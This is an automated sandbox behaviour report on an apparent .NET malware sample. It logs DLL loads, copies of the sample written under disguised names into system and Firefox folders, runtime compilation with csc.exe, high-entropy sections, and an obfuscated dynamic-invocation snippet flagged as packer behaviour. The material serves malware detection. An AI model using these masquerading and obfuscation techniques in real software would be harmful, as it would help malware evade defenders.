Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Recovery\sihost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\sihost.exe	Section loaded: apphelp.dll
Source: C:\Recovery\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: version.dll
Source: C:\Recovery\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\sihost.exe	Section loaded: wldp.dll
Source: C:\Recovery\sihost.exe	Section loaded: profapi.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\sihost.exe	Section loaded: sspicli.dll
Source: C:\Recovery\sihost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: version.dll
Source: C:\Recovery\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\sihost.exe	Section loaded: wldp.dll
Source: C:\Recovery\sihost.exe	Section loaded: profapi.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\sihost.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: version.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wldp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: version.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wldp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: version.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wldp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ktmw32.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wbemcomn.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: dnsapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: winnsi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rasapi32.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rasman.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rtutils.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: winhttp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: propsys.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: dlnashext.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wpdshext.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: edputil.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: urlmon.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: iertutil.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: srvcli.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: netutils.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wintypes.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: appresolver.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: bcp47langs.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: slc.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: userenv.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: sppc.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: mscoree.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: apphelp.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: version.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wldp.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: profapi.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Branding\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: mscoree.dll
Source: C:\Recovery\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\sihost.exe	Section loaded: version.dll
Source: C:\Recovery\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\sihost.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\sihost.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\sihost.exe	Section loaded: wldp.dll
Source: C:\Recovery\sihost.exe	Section loaded: profapi.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\sihost.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\sihost.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\sihost.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: mscoree.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: version.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: wldp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: profapi.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\0J5DzstGPi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Directory created: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe			Jump to behavior
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Directory created: C:\Program Files\Mozilla Firefox\17c9f4d4cfaa6e			Jump to behavior

Source: 0J5DzstGPi.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0J5DzstGPi.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 0J5DzstGPi.exe

Static file information: File size 1958912 > 1048576

Source: 0J5DzstGPi.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1ddc00

Source: 0J5DzstGPi.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.PDB source: steBCuuQsIefcKufvgYbRBCxKhPR.exe, 0000002F.00000002.2158771619.000000001B3D6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.pdb source: 0J5DzstGPi.exe, 00000000.00000002.1803810582.00000000034D9000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0J5DzstGPi.exe, ClS6ZS2Ih1e0y9FFSfj.cs

.Net Code: Type.GetTypeFromHandle(Ujyr2qF3VCPI6TUJfpP.p50yEkWespR(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Ujyr2qF3VCPI6TUJfpP.p50yEkWespR(16777245)),Type.GetTypeFromHandle(Ujyr2qF3VCPI6TUJfpP.p50yEkWespR(16777259))})

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline"
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qchs0ptz\qchs0ptz.cmdline"			Jump to behavior

Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 0_2_00007FFD9B8B00BD pushad ; iretd	0_2_00007FFD9B8B00C1
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 0_2_00007FFD9BA17828 push ebp; retf	0_2_00007FFD9BA17858
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 0_2_00007FFD9BA15A1D push edi; iretd	0_2_00007FFD9BA15A1E
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 0_2_00007FFD9BA13174 push ebx; iretd	0_2_00007FFD9BA13177
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 30_2_00007FFD9B77D2A5 pushad ; iretd	30_2_00007FFD9B77D2A6
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 47_2_00007FFD9B8A00BD pushad ; iretd	47_2_00007FFD9B8A00C1
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 47_2_00007FFD9BA07831 push ebp; retf	47_2_00007FFD9BA07858
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 47_2_00007FFD9BA05A1D push edi; iretd	47_2_00007FFD9BA05A1E
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 47_2_00007FFD9BA03174 push ebx; iretd	47_2_00007FFD9BA03177
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8C9751 push edx; ret	55_2_00007FFD9B8C975D
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8C7A99 pushfd ; retf	55_2_00007FFD9B8C7AA1
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8C5CB6 push edx; iretd	55_2_00007FFD9B8C5CBB
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8BCA15 push ss; ret	55_2_00007FFD9B8BCA3A
Source: C:\Recovery\sihost.exe	Code function: 55_2_00007FFD9B8E5DBB push cs; retf	55_2_00007FFD9B8E5DBF
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8C9751 push edx; ret	56_2_00007FFD9B8C975D
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8C7A94 pushfd ; retf	56_2_00007FFD9B8C7AA1
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8C5CB6 push edx; iretd	56_2_00007FFD9B8C5CBB
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8BCA15 push ss; ret	56_2_00007FFD9B8BCA3A
Source: C:\Program Files\Mozilla Firefox\steBCuuQsIefcKufvgYbRBCxKhPR.exe	Code function: 56_2_00007FFD9B8E5DBB push cs; retf	56_2_00007FFD9B8E5DBF
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8D5DBB push cs; retf	57_2_00007FFD9B8D5DBF
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8ACA15 push ss; ret	57_2_00007FFD9B8ACA3A
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8B9751 push edx; ret	57_2_00007FFD9B8B975D
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8B7A99 pushfd ; retf	57_2_00007FFD9B8B7AA1
Source: C:\Users\user\Desktop\0J5DzstGPi.exe	Code function: 57_2_00007FFD9B8B5CB6 push edx; iretd	57_2_00007FFD9B8B5CBB

Source: 0J5DzstGPi.exe	Static PE information: section name: .text entropy: 7.554404258282237
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe.0.dr	Static PE information: section name: .text entropy: 7.554404258282237
Source: sihost.exe.0.dr	Static PE information: section name: .text entropy: 7.554404258282237
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe0.0.dr	Static PE information: section name: .text entropy: 7.554404258282237
Source: steBCuuQsIefcKufvgYbRBCxKhPR.exe1.0.dr	Static PE information: section name: .text entropy: 7.554404258282237

Source: 0J5DzstGPi.exe, D8UBKKGkN4UsHidUyIS.cs	High entropy of concatenated method names: 'OBWGBcMQsj', 'AWQGcgFIan', 'eaHGVthQTs', 'ViYGZTQnsB', 'uQDGnjc1ot', 'v88GRLXqNY', 'tPaG87Yg3S', 'FF0G9uTxTR', 'Dispose', 'ruth5cf2XDkoitFYaqmy'
